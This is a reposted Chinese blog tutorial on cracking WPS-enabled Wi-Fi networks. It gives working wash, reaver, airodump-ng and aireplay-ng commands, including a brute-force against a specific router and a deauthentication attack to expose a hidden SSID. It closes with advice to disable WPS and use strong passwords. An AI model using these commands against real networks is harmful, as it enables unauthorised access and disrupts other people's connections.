转:使用Reaver破解开启了WPS功能的wifi密码(wpa/wpa2)


来自wikipeida:

Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。

在2011年12月28日安全专家Stefan Viehbock报出此标准的一个重大安全漏洞,此漏洞允许远程攻击者使用暴力攻击在几小时内就能获取WPS的PIN码和WPA/WPA2的PSK码。一些新出产的无线路默认启动WPS功能,所以现在建议用户关闭无线路由器上的WPS一键加密功能,虽然有些无线器上无法关闭此功能。

WPS的目的是简化用户输入密码的步骤;在某个设备连接wifi,需要输入密码时,只要按一下无线路由器上的wps按钮就可以了。

Reaver是除字典破解之外的另一个选择:

如果无线路由器开启了WPS,就不必使用上面的破解方法了。

WPS的pin码并没有加密。Reaver会暴力破解pin码,找到pin码也就找到了密码。一般用时也不短。

注意:

  • 网卡支持数据包注入,一般笔记本不支持
  • 要求无线信号强
  • 如果发送pin码过快,有可能造成路由器崩溃;就类似对服务器的DDOS攻击。
  • Reaver有很多选项,我只使用最基本的选项,你也许需要根据情况使用其他选项。查看帮助:reaver ?

执行Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)中的前三步,打开无线网卡的的监控模式。

3)找到开启WPS功能的无线路由器

我们不用逐一测试,而是使用wash命令。

# wash -i wlan0mon -C

如果什么也没有表示周围没有开启WPS的无线路由器。记住要破解wifi的BSSID。

4)开始破解密码

# reaver -i wlan0mon -b C8:3A:35:30:3E:C8 -vv -a

等待2-10小时:

最后,不要忘了结束无线网卡的监控模式:

# airmon-ng stop wlan0mon

总结:wps这个功能不用就把它关闭了吧。


一个小实验:

我看到有人说隐藏SSID可以让wifi更不容易被破解,我就来测试一下。

隐藏SSID就是把你老大的AP隐藏起来,不让别人搜索到。请注意,这样的话,在连接wifi时就要手动输入AP名。

1498133764-6481-from-2016-04-22-15-45-17

只看到了 length 12,没有ap名。

查看方法:

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan0mon
# aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

破解密码的方法不变;使用上面两个命令就可以轻松得到ap名。

事实证明,隐藏SSID并不管啥事;其实设置一个复杂的密码比隐藏SSID要管用的多。

普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress